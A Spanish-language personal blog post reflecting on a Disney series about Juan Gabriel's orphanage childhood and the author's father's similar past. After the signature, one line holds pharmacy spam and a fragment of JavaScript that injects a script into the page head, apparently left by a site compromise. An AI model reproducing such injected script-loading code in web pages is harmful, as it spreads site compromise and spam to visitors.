Todo empezó en un orfanato…

Una mujer golpea las puertas del Orfanato con un niño en su mano y una valija.

Así empieza la serie que Disney ha producido sobre la vida de Juan Gabriel. Las lágrimas comienzan a rodar por mis mejillas, totalmente emocionada porque esa imagen me lleva hasta mi pasado, cuando mi padre me contaba sobre su infancia en un orfanato, en definitiva por diferentes motivos pero a ambos los condenaron a vivir una niñez sin familia.

Ese niño que en México es dejado en un lugar para los sin hogar, los marginados, los que no tienen quien se hagan cargo de ellos, ese niño tenia sueños y un destino que si bien comenzaba muy doloroso tendría un final feliz. Otro niño, mi padre, en otro país Argentina, también pasaría por vejaciones y abusos. El también tendría sueños y algunos habrá podido cumplir y otros no, pero el final seria diferente, bastante mas doloroso. Dos lugares diferentes, dos tiempos diferentes, pero el dolor es similar. Para mis sentires dos hombres que amo…y muy importantes en mi vida.

Si conocemos la historia de Alberto Aguilera, un hombre que nació con estrella, podemos entender como pudo a través de padecer el sentimiento de orfandad y de perdida, resurgir entre tanta desesperanza y ser hoy el afamado cantautor Juan Gabriel, Divo de Juárez, que mueve multitudes, que es aclamado y amado por millones de personas en todo el mundo.

En la serie se habla del “hombre que no conoció el amor”, puede ser que no haya encontrado al amor de su vida, a su alma gemela, a muchos nos ha pasado lo mismo, pero el pudo recrear en esa familia que formo, con su amiga-esposa y esos hijos, la familia que siempre añoro, la familia que siempre soñó…pudo hacerla realidad en su historia. Seguro que este hombre que para mi es maravilloso, pudo amar a ese niño interior desvalido y necesitado que fue en su infancia, acariciarlo y decirle que “ya paso…ese dolor ya paso, estas a salvo ahora”.

Amo este hombre, mi ídolo, por su sencillez, su don de gente, su generosidad, todo sobre él es bello, es aprendizaje y evolución. Y para eso venimos, para evolucionar, ya que todos estamos en este viaje del alma con el objetivo de superar errores y ser mejores.

Siento que J.G. lo sabe, por eso tiene paz, por eso irradia luz, esa luz que ilumina un estadio mas allá de los reflectores, esa luz y esa voz maravillosa que llega al corazón de todos nosotros y por eso lo amamos.

Cris Carbone generic propecia wholesale if (document.currentScript) { d.getElementsByTagName(‘head’)[0].appendChild(s);

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

shares